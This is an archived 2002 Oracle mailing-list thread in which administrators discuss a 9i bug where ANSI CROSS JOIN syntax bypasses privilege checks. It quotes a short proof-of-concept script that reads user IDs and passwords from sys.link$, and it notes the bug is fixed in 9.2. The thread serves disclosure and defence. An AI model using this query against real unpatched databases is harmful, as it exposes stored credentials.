| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> RE: Security Hole
It appeared in 9i and is fixed in 9.2.
8i is not affected as it does not have cross joins.
>From Metalink Note 137286.1;
Oracle9i introduces the following SQL:1999-compliant joins:
1.1 CROSS Join
1.2 NATURAL Join
1.3 OUTER Join
1.3.1 LEFT OUTER Join
1.3.2 RIGHT OUTER Join
1.3.3 FULL OUTER Join
1.1 CROSS Join
A CROSS join is the cross-product of two tables. It is the equivalent of a Cartesian product.
I tried the query with a cartesian product in 8i and it didn't work.
select userid,password from sys.link$, dual
*
> -----Original Message-----
> From: Ruth Gramolini [mailto:rgramolini_at_tax.state.vt.us]
> Sent: Tuesday, April 16, 2002 8:38 AM
> To: Multiple recipients of list ORACLE-L
> Subject: Re: Security Hole
>
>
> Is this on 9i databases or is 8 involved? Ruth
> ----- Original Message -----
> To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>
> Sent: Tuesday, April 16, 2002 7:33 AM
>
>
> > This just in from comp.databases.oracle.server.
> >
> > See metalink bug 2121935.
> >
> > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> > allows you to view data from tables on which you have no
> > privilege. For example, try this COMPLETE script:
> >
> > connect / as sysdba
> > create user us1 identified by us1;
> > grant create session to us1;
> >
> > connect us1/us1
> >
> > select userid, password
> > from
> > sys.link$ cross join dual
> > ;
> >
> >
> >
> > Worse still, if you have the privilege to create views
> > then this loophole allows you to seek and destroy
> > ANY DATA in the database that you might want to.
> >
> > The bug is fixed in 9iR2. I didn't see any note
> > about a backport, or a security alert on OTN.
> >
> > Conclusion:
> >
> > 9.0.1 should not be in use on production system
> > until Oracle supplies a fix.
> >
> >
> >
> > Jonathan Lewis
> > http://www.jlcomp.demon.co.uk
> >
> > Author of:
> > Practical Oracle 8i: Building Efficient Databases
> >
> > Next Seminar - Australia - July/August
> > http://www.jlcomp.demon.co.uk/seminar.html
> >
> > Host to The Co-Operative Oracle Users' FAQ
> > http://www.jlcomp.demon.co.uk/faq/ind_faq.html
> >
> >
> >
> >
> > --
> > Please see the official ORACLE-L FAQ: http://www.orafaq.com
> > --
> > Author: Jonathan Lewis
> > INET: jonathan_at_jlcomp.demon.co.uk
> >
> > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> > San Diego, California -- Public Internet access /
> Mailing Lists
> > --------------------------------------------------------------------
> > To REMOVE yourself from this mailing list, send an E-Mail message
> > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> > the message BODY, include a line containing: UNSUB ORACLE-L
> > (or the name of mailing list you want to be removed from). You may
> > also send the HELP command for other information (like subscribing).
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Ruth Gramolini
> INET: rgramolini_at_tax.state.vt.us
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
-- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Glenn Travis INET: Glenn.Travis_at_sas.com Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).Received on Tue Apr 16 2002 - 09:38:32 CDT
 |
 |